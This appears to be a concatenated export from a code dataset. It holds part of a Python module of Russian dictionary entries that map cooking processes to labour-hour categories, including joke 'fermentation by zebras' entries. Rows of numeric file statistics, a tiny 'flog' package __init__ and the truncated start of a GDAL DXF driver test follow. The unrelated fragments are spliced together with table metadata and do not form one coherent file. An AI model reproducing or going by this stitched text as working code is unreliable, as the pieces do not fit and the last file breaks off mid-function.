'_--Кипячение (нормо-часов)':1,
}
metadict_model['_-Кипячение воды (нормо-часов)'] = {
'_--Кипячение (нормо-часов)':1,
}
#----
# Процессы (варка, уваривание):
metadict_model['_-Варка напитка (нормо-часов)'] = {
'_--Варка пищи (нормо-часов)':1,
}
metadict_model['_-Варка бобов (нормо-часов)'] = {
'_--Варка пищи (нормо-часов)':1,
}
metadict_model['_-Варка грибов (нормо-часов)'] = {
'_--Варка пищи (нормо-часов)':1,
}
metadict_model['_-Варка овощей (нормо-часов)'] = {
'_--Варка пищи (нормо-часов)':1,
}
metadict_model['_-Варка орехов (нормо-часов)'] = {
'_--Варка пищи (нормо-часов)':1,
}
metadict_model['_-Варка супа (нормо-часов)'] = {
'_--Варка пищи (нормо-часов)':1,
}
metadict_model['_-Варка лапши (нормо-часов)'] = {
'_--Варка пищи (нормо-часов)':1,
}
metadict_model['_-Варка вареников (нормо-часов)'] = {
'_--Варка пищи (нормо-часов)':1,
}
metadict_model['_-Варка пудинга (нормо-часов)'] = {
'_--Варка пищи (нормо-часов)':1,
}
metadict_model['_-Варка рисовых лепёшек (нормо-часов)'] = {
'_--Варка пищи (нормо-часов)':1,
}
metadict_model['_-Варка каши (нормо-часов)'] = {
'_--Варка пищи (нормо-часов)':1,
}
metadict_model['_-Варка риса (нормо-часов)'] = {
'_--Варка пищи (нормо-часов)':1,
}
metadict_model['_-Варка пшена (нормо-часов)'] = {
'_--Варка пищи (нормо-часов)':1,
}
metadict_model['_-Варка корнеплодов (нормо-часов)'] = {
'_--Варка пищи (нормо-часов)':1,
}
metadict_model['_-Варка компота (нормо-часов)'] = {
'_--Варка пищи (нормо-часов)':1,
}
metadict_detail['_-Бланширование овощей (нормо-часов)'] = {
'_--Варка пищи (нормо-часов)':1,
}
metadict_detail['_-Бланширование фруктов (нормо-часов)'] = {
'_--Варка пищи (нормо-часов)':1,
}
metadict_detail['_-Бланширование семян (нормо-часов)'] = {
'_--Варка пищи (нормо-часов)':1,
}
metadict_detail['_-Заваривание чая (нормо-часов)'] = {
'_--Варка пищи (нормо-часов)':1,
}
metadict_model['_-Заваривание кофе (нормо-часов)'] = {
'_--Варка пищи (нормо-часов)':1,
}
#----
# Процессы (варка, уваривание заранее):
metadict_model['_-Варка напитка заранее (нормо-часов)'] = {
'_--Варка пищи заранее (нормо-часов)':1,
}
metadict_model['_-Варка бульона заранее (нормо-часов)'] = {
'_--Варка пищи заранее (нормо-часов)':1,
}
metadict_model['_-Варка соуса заранее (нормо-часов)'] = {
'_--Варка пищи заранее (нормо-часов)':1,
}
metadict_model['_-Варка фруктов заранее (нормо-часов)'] = {
'_--Варка пищи заранее (нормо-часов)':1,
}
metadict_model['_-Варка сиропа заранее (нормо-часов)'] = {
'_--Варка пищи заранее (нормо-часов)':1,
}
metadict_model['_-Варка яблочного джема (нормо-часов)'] = {
'_--Варка пищи заранее (нормо-часов)':1,
}
metadict_model['_-Варка варенья (нормо-часов)'] = {
'_--Варка пищи заранее (нормо-часов)':1,
}
metadict_model['_-Варка семян (нормо-часов)'] = {
'_--Варка пищи заранее (нормо-часов)':1,
}
metadict_model['_-Уваривание сиропа (нормо-часов)'] = {
'_--Варка пищи заранее (нормо-часов)':1,
}
metadict_model['_-Уваривание сока кленового (нормо-часов)'] = {
'_--Варка пищи заранее (нормо-часов)':1,
}
metadict_model['_-Уваривание сока виноградного (нормо-часов)'] = {
'_--Варка пищи заранее (нормо-часов)':1,
}
metadict_model['_-Уваривание томатов (нормо-часов)'] = {
'_--Варка пищи заранее (нормо-часов)':1,
}
metadict_model['_-Уваривание фруктов (нормо-часов)'] = {
'_--Варка пищи заранее (нормо-часов)':1,
}
metadict_model['_-Уваривание бульона (нормо-часов)'] = {
'_--Варка пищи заранее (нормо-часов)':1,
}
metadict_model['_-Бланширование лапши (нормо-часов)'] = {
'_--Варка пищи заранее (нормо-часов)':1,
}
metadict_model['_-Бланширование орехов (нормо-часов)'] = {
'_--Варка пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Заваривание муки (нормо-часов)'] = {
'_--Варка пищи заранее (нормо-часов)':1,
}
#----
# Процессы (тушение):
metadict_model['_-Тушение грибов (нормо-часов)'] = {
'_--Тушение пищи (нормо-часов)':1,
}
metadict_model['_-Тушение бобов (нормо-часов)'] = {
'_--Тушение пищи (нормо-часов)':1,
}
metadict_model['_-Тушение овощей (нормо-часов)'] = {
'_--Тушение пищи (нормо-часов)':1,
}
metadict_model['_-Тушение фруктов (нормо-часов)'] = {
'_--Тушение пищи (нормо-часов)':1,
}
#----
# Процессы (томление):
metadict_model['_-Томление овощей (нормо-часов)'] = {
'_--Томление пищи (нормо-часов)':1,
}
metadict_model['_-Томление пудинга (нормо-часов)'] = {
'_--Томление пищи (нормо-часов)':1,
}
metadict_model['_-Томление каши (нормо-часов)'] = {
'_--Томление пищи (нормо-часов)':1,
}
#----
# Процессы (запекание):
metadict_model['_-Запекание овощей (нормо-часов)'] = {
'_--Запекание пищи (нормо-часов)':1,
}
metadict_model['_-Запекание корнеплодов (нормо-часов)'] = {
'_--Запекание пищи (нормо-часов)':1,
}
metadict_model['_-Запекание фруктов (нормо-часов)'] = {
'_--Запекание пищи (нормо-часов)':1,
}
metadict_model['_-Запекание орехов (нормо-часов)'] = {
'_--Запекание пищи (нормо-часов)':1,
}
#----
# Процессы (выпечка):
metadict_model['_-Выпечка хлеба (нормо-часов)'] = {
'_--Выпечка пищи (нормо-часов)':1,
}
metadict_model['_-Выпечка пудинга (нормо-часов)'] = {
'_--Выпечка пищи (нормо-часов)':1,
}
metadict_model['_-Выпечка пряников (нормо-часов)'] = {
'_--Выпечка пищи (нормо-часов)':1,
}
metadict_model['_-Выпечка печенья (нормо-часов)'] = {
'_--Выпечка пищи (нормо-часов)':1,
}
metadict_detail['_-Выпечка блинов (нормо-часов)'] = {
'_--Выпечка пищи (нормо-часов)':1,
}
metadict_detail['_-Выпечка булочек (нормо-часов)'] = {
'_--Выпечка пищи (нормо-часов)':1,
}
metadict_detail['_-Выпечка кексов (нормо-часов)'] = {
'_--Выпечка пищи (нормо-часов)':1,
}
metadict_detail['_-Выпечка лепёшек (нормо-часов)'] = {
'_--Выпечка пищи (нормо-часов)':1,
}
metadict_detail['_-Выпечка пирога (нормо-часов)'] = {
'_--Выпечка пищи (нормо-часов)':1,
}
metadict_detail['_-Выпечка пирожков (нормо-часов)'] = {
'_--Выпечка пищи (нормо-часов)':1,
}
metadict_detail['_-Выпечка суфле (нормо-часов)'] = {
'_--Выпечка пищи (нормо-часов)':1,
}
#----
# Процессы (прокаливание, выпечка заранее):
metadict_model['_-Прокаливание крупы (нормо-часов)'] = {
'_--Прокаливание пищи заранее (нормо-часов)':1,
}
metadict_model['_-Прокаливание муки (нормо-часов)'] = {
'_--Прокаливание пищи заранее (нормо-часов)':1,
}
#----
# Процессы (жарение):
metadict_model['_-Жарение темпе (нормо-часов)'] = {
'_--Жарение пищи (нормо-часов)':1,
}
metadict_model['_-Жарение блинов (нормо-часов)'] = {
'_--Жарение пищи (нормо-часов)':1,
}
metadict_model['_-Жарение оладий (нормо-часов)'] = {
'_--Жарение пищи (нормо-часов)':1,
}
metadict_model['_-Жарение пончиков (нормо-часов)'] = {
'_--Жарение пищи (нормо-часов)':1,
}
metadict_detail['_-Жарение выпечки (нормо-часов)'] = {
'_--Жарение пищи (нормо-часов)':1,
}
metadict_model['_-Жарение грибов (нормо-часов)'] = {
'_--Жарение пищи (нормо-часов)':1,
}
metadict_model['_-Жарение овощей (нормо-часов)'] = {
'_--Жарение пищи (нормо-часов)':1,
}
metadict_model['_-Жарение фруктов (нормо-часов)'] = {
'_--Жарение пищи (нормо-часов)':1,
}
metadict_model['_-Обжаривание хлеба (нормо-часов)'] = {
'_--Жарение пищи (нормо-часов)':1,
}
#----
# Процессы (жарение заранее):
metadict_model['_-Обжаривание бобов (нормо-часов)'] = {
'_--Жарение пищи заранее (нормо-часов)':1,
}
metadict_model['_-Обжаривание орехов (нормо-часов)'] = {
'_--Жарение пищи заранее (нормо-часов)':1,
}
metadict_model['_-Обжаривание семян (нормо-часов)'] = {
'_--Жарение пищи заранее (нормо-часов)':1,
}
metadict_model['_-Обжаривание кофейных зёрен (нормо-часов)'] = {
'_--Жарение пищи заранее (нормо-часов)':1,
}
#----
# Процессы (протирание, выдавливание):
metadict_detail['_-Протирание бобов (нормо-часов)'] = {
'_--Протирание пищи (нормо-часов)':1,
}
metadict_detail['_-Протирание зелени (нормо-часов)'] = {
'_--Протирание пищи (нормо-часов)':1,
}
metadict_detail['_-Протирание овощей (нормо-часов)'] = {
'_--Протирание пищи (нормо-часов)':1,
}
metadict_detail['_-Протирание фруктов (нормо-часов)'] = {
'_--Протирание пищи (нормо-часов)':1,
}
metadict_detail['_-Выдавливание чеснока (нормо-часов)'] = {
'_--Протирание пищи (нормо-часов)':1,
}
#----
# Процессы (протирание, выдавливание заранее):
metadict_detail['_-Процеживание бульона (нормо-часов)'] = {
'_--Протирание пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Протирание томатов заранее (нормо-часов)'] = {
'_--Протирание пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Протирание семян (нормо-часов)'] = {
'_--Протирание пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Протирание орехов (нормо-часов)'] = {
'_--Протирание пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Протирание крупы (нормо-часов)'] = {
'_--Протирание пищи заранее (нормо-часов)':1,
}
#----
# Процессы (отжим):
metadict_model['_-Отжим овощей (нормо-часов)'] = {
'_--Отжим пищи заранее (нормо-часов)':1,
}
metadict_model['_-Отжим фруктов (нормо-часов)'] = {
'_--Отжим пищи заранее (нормо-часов)':1,
}
metadict_model['_-Отжим соевого сусла (нормо-часов)'] = {
'_--Отжим пищи заранее (нормо-часов)':1,
}
#----
# Процессы (взбивание):
metadict_model['_-Взбивание крема (нормо-часов)'] = {
'_--Взбивание пищи (нормо-часов)':1,
}
metadict_model['_-Взбивание аквафабы (нормо-часов)'] = {
'_--Взбивание пищи (нормо-часов)':1,
}
#----
# Процессы (панировка, покрытия):
metadict_detail['_-Панировка грибов (нормо-часов)'] = {
'_--Панировка пищи (нормо-часов)':1,
}
metadict_detail['_-Панировка запеканки (нормо-часов)'] = {
'_--Панировка пищи (нормо-часов)':1,
}
metadict_detail['_-Панировка мелкой выпечки (нормо-часов)'] = {
'_--Панировка пищи (нормо-часов)':1,
}
metadict_detail['_-Панировка овощей (нормо-часов)'] = {
'_--Панировка пищи (нормо-часов)':1,
}
metadict_detail['_-Панировка овощей в масле (нормо-часов)'] = {
'_--Панировка пищи (нормо-часов)':1,
}
metadict_model['_-Натирание хлеба чесноком (нормо-часов)'] = {
'_--Панировка пищи (нормо-часов)':1,
}
metadict_detail['_-Смазывание оладьев соусом (нормо-часов)'] = {
'_--Панировка пищи (нормо-часов)':1,
}
#----
# Процессы (фаршировка):
metadict_model['_-Приготовление террина (нормо-часов)'] = {
'_--Фаршировка пищи (нормо-часов)':1,
}
metadict_model['_-Приготовление сэндвичей (нормо-часов)'] = {
'_--Фаршировка пищи (нормо-часов)':1,
}
metadict_detail['_-Фаршировка блинчиков (нормо-часов)'] = {
'_--Фаршировка пищи (нормо-часов)':1,
}
metadict_detail['_-Фаршировка булочек (нормо-часов)'] = {
'_--Фаршировка пищи (нормо-часов)':1,
}
metadict_detail['_-Фаршировка вареников (нормо-часов)'] = {
'_--Фаршировка пищи (нормо-часов)':1,
}
metadict_detail['_-Фаршировка голубцов (нормо-часов)'] = {
'_--Фаршировка пищи (нормо-часов)':1,
}
metadict_detail['_-Фаршировка капкейков (нормо-часов)'] = {
'_--Фаршировка пищи (нормо-часов)':1,
}
metadict_detail['_-Фаршировка пирожков (нормо-часов)'] = {
'_--Фаршировка пищи (нормо-часов)':1,
}
metadict_detail['_-Фаршировка пиццы (нормо-часов)'] = {
'_--Фаршировка пищи (нормо-часов)':1,
}
metadict_detail['_-Фаршировка рулета (нормо-часов)'] = {
'_--Фаршировка пищи (нормо-часов)':1,
}
metadict_detail['_-Фаршировка средних овощей (нормо-часов)'] = {
'_--Фаршировка пищи (нормо-часов)':1,
}
metadict_detail['_-Фаршировка тыквы (нормо-часов)'] = {
'_--Фаршировка пищи (нормо-часов)':1,
}
#----
# Процессы (смешивание, вымешивание):
metadict_model['_-Смешивание еды (нормо-часов)'] = {
'_--Вымешивание пищи (нормо-часов)':1,
}
metadict_model['_-Смешивание питья (нормо-часов)'] = {
'_--Вымешивание пищи (нормо-часов)':1,
}
metadict_model['_-Вымешивание пудинга (нормо-часов)'] = {
'_--Вымешивание пищи (нормо-часов)':1,
}
metadict_model['_-Заворачивание пудинга (нормо-часов)'] = {
'_--Вымешивание пищи (нормо-часов)':1,
}
metadict_model['_-Обминка теста (нормо-часов)'] = {
'_--Вымешивание пищи (нормо-часов)':1,
}
metadict_model['_-Разделка теста (нормо-часов)'] = {
'_--Вымешивание пищи (нормо-часов)':1,
}
metadict_model['_-Раскатка теста (нормо-часов)'] = {
'_--Вымешивание пищи (нормо-часов)':1,
}
metadict_model['_-Растягивание теста (нормо-часов)'] = {
'_--Вымешивание пищи (нормо-часов)':1,
}
metadict_model['_-Формовка теста (нормо-часов)'] = {
'_--Вымешивание пищи (нормо-часов)':1,
}
metadict_detail['_-Приготовление желе (нормо-часов)'] = {
'_--Вымешивание пищи (нормо-часов)':1,
}
#----
# Процессы (смешивание, вымешивание заранее):
metadict_model['_-Смешивание сиропа (нормо-часов)'] = {
'_--Вымешивание пищи заранее (нормо-часов)':1,
}
metadict_model['_-Вымешивание теста (нормо-часов)'] = {
'_--Вымешивание пищи заранее (нормо-часов)':1,
}
metadict_model['_-Вымешивание соуса (нормо-часов)'] = {
'_--Вымешивание пищи заранее (нормо-часов)':1,
}
metadict_model['_-Вымешивание мёда (нормо-часов)'] = {
'_--Вымешивание пищи заранее (нормо-часов)':1,
}
metadict_model['_-Вымешивание пасты (нормо-часов)'] = {
'_--Вымешивание пищи заранее (нормо-часов)':1,
}
metadict_model['_-Вымешивание рассола (нормо-часов)'] = {
'_--Вымешивание пищи заранее (нормо-часов)':1,
}
metadict_model['_-Вымешивание раствора (нормо-часов)'] = {
'_--Вымешивание пищи заранее (нормо-часов)':1,
}
metadict_model['_-Вымешивание соевого сусла (нормо-часов)'] = {
'_--Вымешивание пищи заранее (нормо-часов)':1,
}
#----
# Процессы (квашение, мочение):
metadict_model['_-Квашение капусты (нормо-часов)'] = {
'_--Квашение пищи заранее (нормо-часов)':1,
}
metadict_model['_-Квашение овощей (нормо-часов)'] = {
'_--Квашение пищи заранее (нормо-часов)':1,
}
metadict_model['_-Мочение фруктов (нормо-часов)'] = {
'_--Квашение пищи заранее (нормо-часов)':1,
}
#----
# Процессы (дрожжевое брожение):
metadict_model['_-Приготовление кваса (нормо-часов)'] = {
'_--Брожение пищи заранее (нормо-часов)':1,
}
metadict_model['_-Приготовление эля (нормо-часов)'] = {
'_--Брожение пищи заранее (нормо-часов)':1,
}
metadict_model['_-Приготовление закваски (нормо-часов)'] = {
'_--Брожение пищи заранее (нормо-часов)':1,
}
metadict_model['_-Приготовление опары (нормо-часов)'] = {
'_--Брожение пищи заранее (нормо-часов)':1,
}
metadict_model['_-Приготовление сидра (нормо-часов)'] = {
'_--Брожение пищи заранее (нормо-часов)':1,
}
metadict_model['_-Приготовление вина (нормо-часов)'] = {
'_--Брожение пищи заранее (нормо-часов)':1,
}
metadict_model['_-Приготовление соевого соуса (нормо-часов)'] = {
'_--Брожение пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Уход за грибковой культурой дрожжей (нормо-часов)'] = {
'_--Брожение пищи заранее (нормо-часов)':1,
}
metadict_model['_-Уход за грибковой культурой темпе (нормо-часов)'] = {
'_--Брожение пищи заранее (нормо-часов)':1,
}
metadict_model['_-Уход за грибковой культурой коджи (нормо-часов)'] = {
'_--Брожение пищи заранее (нормо-часов)':1,
}
#----
# Процессы (маринование):
metadict_model['_-Маринование овощей (нормо-часов)'] = {
'_--Маринование пищи заранее (нормо-часов)':1,
}
metadict_model['_-Маринование грибов (нормо-часов)'] = {
'_--Маринование пищи заранее (нормо-часов)':1,
}
metadict_model['_-Маринование фруктов (нормо-часов)'] = {
'_--Маринование пищи заранее (нормо-часов)':1,
}
#----
# Процессы (соление):
metadict_detail['_-Соление грибов (нормо-часов)'] = {
'_--Соление пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Соление овощей (нормо-часов)'] = {
'_--Соление пищи заранее (нормо-часов)':1,
}
#----
# Процессы (ферментация):
metadict_model['_-Ферментация стручков ванили (нормо-часов)'] = {
# Хм, Ферментация зебрами! Я просто не могу удержаться.
'_--Ферментация пищи зебрами (нормо-часов)':1,
}
metadict_model['_-Ферментация кофейных зёрен (нормо-часов)'] = {
'_--Ферментация пищи зебрами (нормо-часов)':1,
}
metadict_model['_-Ферментация какао-бобов (нормо-часов)'] = {
'_--Ферментация пищи зебрами (нормо-часов)':1,
}
#----
# Процессы (проращивание, соложение):
metadict_detail['_-Проращивание бобов (нормо-часов)'] = {
'_--Проращивание пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Проращивание зерна (нормо-часов)'] = {
'_--Проращивание пищи заранее (нормо-часов)':1,
}
#----
# Процессы (замачивание, регидрация):
metadict_model['_-Замачивание бобов (нормо-часов)'] = {
'_--Замачивание пищи заранее (нормо-часов)':1,
}
metadict_model['_-Замачивание орехов (нормо-часов)'] = {
'_--Замачивание пищи заранее (нормо-часов)':1,
}
metadict_model['_-Замачивание грибов (нормо-часов)'] = {
'_--Замачивание пищи заранее (нормо-часов)':1,
}
metadict_model['_-Замачивание зерна (нормо-часов)'] = {
'_--Замачивание пищи заранее (нормо-часов)':1,
}
metadict_model['_-Замачивание овощей (нормо-часов)'] = {
'_--Замачивание пищи заранее (нормо-часов)':1,
}
metadict_model['_-Замачивание фруктов (нормо-часов)'] = {
'_--Замачивание пищи заранее (нормо-часов)':1,
}
metadict_model['_-Замачивание сладостей (нормо-часов)'] = {
'_--Замачивание пищи заранее (нормо-часов)':1,
}
metadict_model['_-Замачивание риса (нормо-часов)'] = {
'_--Замачивание пищи заранее (нормо-часов)':1,
}
#----
# Процессы (сушка, дегидрация):
metadict_detail['_-Сушка лапши (нормо-часов)'] = {
'_--Сушка пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Сушка овощей (нормо-часов)'] = {
'_--Сушка пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Сушка пастилы (нормо-часов)'] = {
'_--Сушка пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Сушка сладостей (нормо-часов)'] = {
'_--Сушка пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Сушка сухарей (нормо-часов)'] = {
'_--Сушка пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Сушка трав (нормо-часов)'] = {
'_--Сушка пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Сушка фруктов (нормо-часов)'] = {
'_--Сушка пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Сушка ягод (нормо-часов)'] = {
'_--Сушка пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Сушка грибов (нормо-часов)'] = {
'_--Сушка пищи заранее (нормо-часов)':1,
}
#----
# Процессы (сушка, дегидрация зебрами):
metadict_detail['_-Сушка чайных листьев зебрами (нормо-часов)'] = {
'_--Сушка пищи зебрами (нормо-часов)':1,
}
metadict_detail['_-Сушка какао-бобов зебрами (нормо-часов)'] = {
'_--Сушка пищи зебрами (нормо-часов)':1,
}
metadict_detail['_-Сушка стручков ванили зебрами (нормо-часов)'] = {
'_--Сушка пищи зебрами (нормо-часов)':1,
}
metadict_detail['_-Сушка плодов кофейного дерева зебрами (нормо-часов)'] = {
'_--Сушка пищи зебрами (нормо-часов)':1,
}
#----
# Процессы (помол):
metadict_detail['_-Помол кофейных зёрен (нормо-часов)'] = {
'_--Помол пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Помол пряностей (нормо-часов)'] = {
'_--Помол пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Помол сахара-песка (нормо-часов)'] = {
'_--Помол пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Помол сухарей (нормо-часов)'] = {
'_--Помол пищи заранее (нормо-часов)':1,
}
#----
# Процессы (шинковка):
metadict_detail['_-Шинковка грибов (нормо-часов)'] = {
'_--Шинковка пищи (нормо-часов)':1,
}
metadict_detail['_-Шинковка зелени (нормо-часов)'] = {
'_--Шинковка пищи (нормо-часов)':1,
}
metadict_detail['_-Шинковка овощей (нормо-часов)'] = {
'_--Шинковка пищи (нормо-часов)':1,
}
metadict_detail['_-Шинковка орехов (нормо-часов)'] = {
'_--Шинковка пищи (нормо-часов)':1,
}
metadict_detail['_-Шинковка фруктов (нормо-часов)'] = {
'_--Шинковка пищи (нормо-часов)':1,
}
#----
# Процессы (нарезка):
metadict_detail['_-Нарезка зелени (нормо-часов)'] = {
'_--Нарезка пищи (нормо-часов)':1,
}
metadict_detail['_-Нарезка лапши (нормо-часов)'] = {
'_--Нарезка пищи (нормо-часов)':1,
}
metadict_detail['_-Нарезка овощей (нормо-часов)'] = {
'_--Нарезка пищи (нормо-часов)':1,
}
metadict_detail['_-Нарезка орехов (нормо-часов)'] = {
'_--Нарезка пищи (нормо-часов)':1,
}
metadict_detail['_-Нарезка темпе (нормо-часов)'] = {
'_--Нарезка пищи (нормо-часов)':1,
}
metadict_detail['_-Нарезка фруктов (нормо-часов)'] = {
'_--Нарезка пищи (нормо-часов)':1,
}
metadict_detail['_-Нарезка хлеба (нормо-часов)'] = {
'_--Нарезка пищи (нормо-часов)':1,
}
#----
# Процессы (чистка):
metadict_detail['_-Чистка корнеплодов (нормо-часов)'] = {
'_--Чистка пищи (нормо-часов)':1,
}
metadict_detail['_-Чистка овощей (нормо-часов)'] = {
'_--Чистка пищи (нормо-часов)':1,
}
metadict_detail['_-Чистка орехов (нормо-часов)'] = {
'_--Чистка пищи (нормо-часов)':1,
}
metadict_detail['_-Чистка фруктов (нормо-часов)'] = {
'_--Чистка пищи (нормо-часов)':1,
}
#----
# Процессы (мытьё):
metadict_detail['_-Мытьё грибов (нормо-часов)'] = {
'_--Мытьё пищи (нормо-часов)':1,
}
metadict_detail['_-Мытьё корнеплодов (нормо-часов)'] = {
'_--Мытьё пищи (нормо-часов)':1,
}
metadict_detail['_-Мытьё крупы (нормо-часов)'] = {
'_--Мытьё пищи (нормо-часов)':1,
}
metadict_detail['_-Мытьё овощей (нормо-часов)'] = {
'_--Мытьё пищи (нормо-часов)':1,
}
metadict_detail['_-Мытьё орехов (нормо-часов)'] = {
'_--Мытьё пищи (нормо-часов)':1,
}
metadict_detail['_-Мытьё посуды (нормо-часов)'] = {
'_--Мытьё пищи (нормо-часов)':1,
}
metadict_detail['_-Мытьё фруктов (нормо-часов)'] = {
'_--Мытьё пищи (нормо-часов)':1,
}
#----
# Процессы (сортировка):
metadict_detail['_-Сортировка корнеплодов (нормо-часов)'] = {
'_--Сортировка пищи (нормо-часов)':1,
}
metadict_detail['_-Сортировка овощей (нормо-часов)'] = {
'_--Сортировка пищи (нормо-часов)':1,
}
metadict_detail['_-Сортировка орехов (нормо-часов)'] = {
'_--Сортировка пищи (нормо-часов)':1,
}
metadict_detail['_-Сортировка фруктов (нормо-часов)'] = {
'_--Сортировка пищи (нормо-часов)':1,
}
#----
# Процессы (перебор):
metadict_detail['_-Перебор грибов (нормо-часов)'] = {
'_--Перебор пищи (нормо-часов)':1,
}
metadict_detail['_-Перебор овощей (нормо-часов)'] = {
'_--Перебор пищи (нормо-часов)':1,
}
metadict_detail['_-Перебор фруктов (нормо-часов)'] = {
'_--Перебор пищи (нормо-часов)':1,
}
metadict_detail['_-Перебор ягод (нормо-часов)'] = {
'_--Перебор пищи (нормо-часов)':1,
}
#----
# Процессы (перебор заранее):
metadict_detail['_-Перебор бобов (нормо-часов)'] = {
'_--Перебор пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Перебор крупы (нормо-часов)'] = {
'_--Перебор пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Перебор сухофруктов (нормо-часов)'] = {
'_--Перебор пищи заранее (нормо-часов)':1,
}
metadict_detail['_-Перебор трав (нормо-часов)'] = {
'_--Перебор пищи заранее (нормо-часов)':1,
}
| 26.96169
| 98
| 0.593107
| 2,734
| 27,447
| 5.706291
| 0.07169
| 0.289725
| 0.159349
| 0.231395
| 0.827191
| 0.81655
| 0.795462
| 0.758541
| 0.697712
| 0.650215
| 0
| 0.010684
| 0.229278
| 27,447
| 1,017
| 99
| 26.988201
| 0.726813
| 0.045287
| 0
| 0.333333
| 0
| 0
| 0.574501
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
16824d7dc74e4a6828a5e4da8b7dbf5dd4b3c9c4
| 173
|
py
|
Python
|
flog/__init__.py
|
mdhalse/flog
|
b8fae638cd23a935c71dc3670c30638aade5fca5
|
[
"MIT"
] | null | null | null |
flog/__init__.py
|
mdhalse/flog
|
b8fae638cd23a935c71dc3670c30638aade5fca5
|
[
"MIT"
] | null | null | null |
flog/__init__.py
|
mdhalse/flog
|
b8fae638cd23a935c71dc3670c30638aade5fca5
|
[
"MIT"
] | 2
|
2018-03-05T17:15:05.000Z
|
2021-03-13T03:29:00.000Z
|
from .flog import CorrelationLoggerAdapter, get_logger, log_call, log_sensitive_call
__all__ = ["CorrelationLoggerAdapter", "get_logger", "log_call", "log_sensitive_call"]
| 43.25
| 86
| 0.815029
| 20
| 173
| 6.45
| 0.5
| 0.418605
| 0.511628
| 0.55814
| 0.868217
| 0.868217
| 0.868217
| 0.868217
| 0
| 0
| 0
| 0
| 0.080925
| 173
| 3
| 87
| 57.666667
| 0.811321
| 0
| 0
| 0
| 0
| 0
| 0.346821
| 0.138728
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
168c9e0f7dfdabd3ef84931ae9ba4337960f1504
| 417,014
|
py
|
Python
|
autotest/ogr/ogr_dxf.py
|
vincentsarago/gdal
|
a04093a73abc2060c0c46f5f03f5940867a1f65d
|
[
"MIT"
] | 1
|
2021-04-10T21:03:13.000Z
|
2021-04-10T21:03:13.000Z
|
autotest/ogr/ogr_dxf.py
|
vincentsarago/gdal
|
a04093a73abc2060c0c46f5f03f5940867a1f65d
|
[
"MIT"
] | null | null | null |
autotest/ogr/ogr_dxf.py
|
vincentsarago/gdal
|
a04093a73abc2060c0c46f5f03f5940867a1f65d
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# $Id$
#
# Project: GDAL/OGR Test Suite
# Purpose: Test OGR DXF driver functionality.
# Author: Frank Warmerdam <warmerdam@pobox.com>
#
###############################################################################
# Copyright (c) 2009, Frank Warmerdam <warmerdam@pobox.com>
# Copyright (c) 2009-2013, Even Rouault <even dot rouault at mines-paris dot org>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
###############################################################################
import os
import sys
from sys import version_info
sys.path.append( '../pymod' )
import ogrtest
import gdaltest
from osgeo import gdal
from osgeo import ogr
###############################################################################
# Check some general things to see if they meet expectations.
def ogr_dxf_1():
    """Open data/assorted.dxf and check general expectations.

    Stashes the datasource/layer on the gdaltest module for the later tests,
    and prepares the utf-8 MTEXT sample strings used by ogr_dxf_9/16.
    Returns 'success' or 'fail' (gdaltest convention).
    """
    gdaltest.dxf_ds = ogr.Open( 'data/assorted.dxf' )

    if gdaltest.dxf_ds is None:
        return 'fail'

    if gdaltest.dxf_ds.GetLayerCount() != 1:
        gdaltest.post_reason( 'expected exactly one layer!' )
        return 'fail'

    gdaltest.dxf_layer = gdaltest.dxf_ds.GetLayer(0)

    if gdaltest.dxf_layer.GetName() != 'entities':
        gdaltest.post_reason( 'did not get expected layer name.' )
        return 'fail'

    defn = gdaltest.dxf_layer.GetLayerDefn()
    if defn.GetFieldCount() != 5:
        gdaltest.post_reason( 'did not get expected number of fields.' )
        return 'fail'

